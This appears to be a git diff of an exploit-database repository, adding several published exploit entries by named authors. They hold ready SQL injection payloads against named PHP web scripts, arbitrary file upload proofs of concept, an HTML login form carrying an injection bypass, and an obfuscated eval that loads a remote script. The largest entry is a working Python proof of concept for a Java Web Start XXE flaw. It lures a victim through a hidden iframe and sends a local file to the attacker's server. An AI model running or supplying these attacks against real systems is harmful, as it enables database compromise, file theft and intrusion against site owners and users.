||||
# Version: 2.2.6
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15965
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL]
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
|
||||
# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END))
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
|
||||
# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
34
platforms/php/webapps/43095.txt
Executable file
34
platforms/php/webapps/43095.txt
Executable file
|
@ -0,0 +1,34 @@
|
|||
# # # # #
|
||||
# Exploit Title: Job Board Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.nicephpscripts.com/
|
||||
# Software http://www.nicephpscripts.com/job_board_script.htm
|
||||
# Demo: http://www.nicephpscripts.com/scripts/faqscript/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15964
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?nice_theme=[SQL]
|
||||
#
|
||||
# Parameter: nice_theme (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: nice_theme=2 AND 9686=9686
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: nice_theme=2 AND SLEEP(5)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
40
platforms/php/webapps/43096.txt
Executable file
40
platforms/php/webapps/43096.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
# # # # #
|
||||
# Exploit Title: iTech Gigs Script 1.21 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://itechscripts.com/
|
||||
# Software Link: http://itechscripts.com/the-gigs-script/
|
||||
# Demo: http://gigs.itechscripts.com/
|
||||
# Version: 1.21
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15963
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/browse-scategory.php?sc=[SQL]
|
||||
#
|
||||
# -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/service-provider.php?ser=[SQL]
|
||||
#
|
||||
# -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
|
||||
#
|
||||
# Parameter: sc (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 10 columns
|
||||
# Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
26
platforms/php/webapps/43097.txt
Executable file
26
platforms/php/webapps/43097.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: iStock Management System 1.0 - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://ikodes.com/
|
||||
# Software Link: https://codecanyon.net/item/istock-management-system/20405084
|
||||
# Demo: http://project.ikodes.com/basicims/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15962
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an users upload arbitrary file....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/user/profile
|
||||
# http://localhost/[PATH]//assets/images/[FILE]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
26
platforms/php/webapps/43098.txt
Executable file
26
platforms/php/webapps/43098.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: iProject Management System 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://ikodes.com/
|
||||
# Software Link: https://codecanyon.net/item/iproject-management-system/20483358
|
||||
# Demo: http://project.ikodes.com/ikpms/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15961
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an users to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?cmd=agent&mod=true&ID=[SQL]
|
||||
# http://localhost/[PATH]/index.php?cmd=client_master&mod=true&ID=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
43
platforms/php/webapps/43099.txt
Executable file
43
platforms/php/webapps/43099.txt
Executable file
|
@ -0,0 +1,43 @@
|
|||
# # # # #
|
||||
# Exploit Title: Article Directory Script 3.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.yourarticlesdirectory.com/
|
||||
# Software Link: http://www.yourarticlesdirectory.com/
|
||||
# Demo: http://www.yourarticlesdirectory.com/livedemo.php
|
||||
# Version: 3.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15960
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/category.php?id=[SQL]
|
||||
#
|
||||
# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/author.php?id=[SQL]
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: id=18 AND 8646=8646
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: id=18 AND SLEEP(5)
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: id=27 AND SLEEP(5)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
32
platforms/php/webapps/43100.txt
Executable file
32
platforms/php/webapps/43100.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
# # # # #
|
||||
# Exploit Title: Adult Script Pro 2.2.4 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.adultscriptpro.com/
|
||||
# Software Link: http://www.adultscriptpro.com/order.html
|
||||
# Demo: http://www.adultscriptpro.com/demo.html
|
||||
# Version: 2.2.4
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15959
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/download/[SQL]
|
||||
#
|
||||
# VerAyari+aNd(SELeCT+1+FroM(SeLECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a)
|
||||
#
|
||||
# Parameter: #1* (URI)
|
||||
# Type: error-based
|
||||
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
# Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
29
platforms/php/webapps/43101.txt
Executable file
29
platforms/php/webapps/43101.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
<!--
|
||||
# # # # #
|
||||
# Exploit Title: D-Park Pro Domain Parking Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.domainzaar.com/
|
||||
# Software Link: http://www.domainzaar.com/
|
||||
# Demo: http://www.d-park-pro.com/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15958
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# # # # #
|
||||
-->
|
||||
<form id="loginform" action="http://localhost/[PATH]/admin/loginform.php" method="post">
|
||||
<label for="form_username">Username:</label>
|
||||
<input type="text" name="username" value="' UNION ALL SELECT 0x31,0x32,0x33,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari" />
|
||||
<label for="form_password">Password:</label>
|
||||
<input type="password" name="password" id="form_password" />
|
||||
<input name="login" value="Log In" type="submit">
|
||||
</form>
|
27
platforms/php/webapps/43102.txt
Executable file
27
platforms/php/webapps/43102.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# # # # #
|
||||
# Exploit Title: Ingenious School Management System 2.3.0 - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://iloveprograming.com/
|
||||
# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
|
||||
# Demo: http://iloveprograming.com/view/login.php
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15957
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
#
|
||||
# The vulnerability allows an student,teacher upload arbitrary file....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/my_profile.php
|
||||
# http://localhost/[PATH]/uploads/[FILE]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
|
@ -104,7 +104,7 @@ function x() {
|
|||
<br />
|
||||
<br />
|
||||
<br />
|
||||
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
|
||||
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
|
158
platforms/xml/webapps/43103.py
Executable file
158
platforms/xml/webapps/43103.py
Executable file
|
@ -0,0 +1,158 @@
|
|||
#!/usr/local/bin/python
|
||||
"""
|
||||
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
|
||||
Affected: <= v8u131
|
||||
File: jre-8u131-windows-i586-iftw.exe
|
||||
SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d
|
||||
Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
|
||||
References: SRC-2017-0028 / CVE-2017-10309
|
||||
Advisory: http://srcincite.io/advisories/src-2017-0028/
|
||||
|
||||
Vulnerability Details:
|
||||
======================
|
||||
|
||||
Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
|
||||
This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF.
|
||||
|
||||
Notes:
|
||||
======
|
||||
|
||||
- It will take a few seconds to fire.
|
||||
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
|
||||
|
||||
Example:
|
||||
========
|
||||
|
||||
saturn:~ mr_me$ ./poc.py
|
||||
|
||||
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
|
||||
mr_me 2017
|
||||
|
||||
(+) usage: ./poc.py <file>
|
||||
(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
|
||||
|
||||
saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
|
||||
|
||||
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
|
||||
mr_me 2017
|
||||
|
||||
(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
|
||||
(+) starting xxe server...
|
||||
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
|
||||
(!) firing webstart...
|
||||
(!) downloading jnlp...
|
||||
(!) downloading si.xml...
|
||||
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
|
||||
^C(+) shutting down the web server
|
||||
saturn:~ mr_me$
|
||||
"""
|
||||
|
||||
import sys
|
||||
import socket
|
||||
import fcntl
|
||||
import struct
|
||||
from random import choice
|
||||
from string import lowercase
|
||||
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
|
||||
|
||||
try:
|
||||
import netifaces as ni
|
||||
except:
|
||||
print "(-) try 'pip install netifaces'"
|
||||
sys.exit(1)
|
||||
|
||||
class xxe(BaseHTTPRequestHandler):
|
||||
|
||||
# stfu
|
||||
def log_message(self, format, *args):
|
||||
return
|
||||
|
||||
def do_GET(self):
|
||||
|
||||
if "leaked" in self.path:
|
||||
print "(+) stolen: %s" % self.path.split("?")[1]
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
elif self.path == "/":
|
||||
print "(!) firing webstart..."
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
message = """
|
||||
<html>
|
||||
<body>
|
||||
<iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe>
|
||||
</body>
|
||||
</html>
|
||||
""" % (ip, path)
|
||||
self.wfile.write(message)
|
||||
self.wfile.write('\n')
|
||||
|
||||
elif "si.xml" in self.path:
|
||||
print "(!) downloading si.xml..."
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
message = """
|
||||
<!ENTITY %% data SYSTEM "file:///%s">
|
||||
<!ENTITY %% param1 "<!ENTITY % exfil SYSTEM 'http://%s:9090/leaked?%%data;'>">
|
||||
""" % (file, ip)
|
||||
self.wfile.write(message)
|
||||
self.wfile.write('\n')
|
||||
|
||||
elif path in self.path:
|
||||
print "(!) downloading jnlp..."
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
message = """
|
||||
<?xml version="1.0" ?>
|
||||
<!DOCTYPE r [
|
||||
<!ELEMENT r ANY >
|
||||
<!ENTITY %% sp SYSTEM "http://%s:9090/si.xml">
|
||||
%%sp;
|
||||
%%param1;
|
||||
%%exfil;
|
||||
]>
|
||||
""" % ip
|
||||
self.wfile.write(message)
|
||||
self.wfile.write('\n')
|
||||
return
|
||||
|
||||
def banner():
|
||||
return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n"""
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
print banner()
|
||||
|
||||
if len(sys.argv) != 2:
|
||||
print "(+) usage: %s <file>" % sys.argv[0]
|
||||
print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
|
||||
sys.exit(1)
|
||||
|
||||
file = sys.argv[1]
|
||||
|
||||
# randomize incase we change payloads and browser caches
|
||||
path = "".join(choice(lowercase) for i in range(10))
|
||||
path += ".jnlp"
|
||||
|
||||
# interfaces
|
||||
ints = ""
|
||||
for i in ni.interfaces(): ints += "%s, " % i
|
||||
interface = raw_input("(+) select your interface: %s: " % ints[:-2])
|
||||
|
||||
# get the ip from the interface
|
||||
try:
|
||||
ip = ni.ifaddresses(interface)[2][0]['addr']
|
||||
except:
|
||||
print "(-) no ip address associated with that interface!"
|
||||
sys.exit(1)
|
||||
print "jnlp://%s:9090/%s" % (ip, path)
|
||||
try:
|
||||
server = HTTPServer(('0.0.0.0', 9090), xxe)
|
||||
print '(+) starting xxe server...'
|
||||
print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
|
||||
server.serve_forever()
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print '(+) shutting down the web server'
|
||||
server.socket.close()
|
Loading…
Add table
Reference in a new issue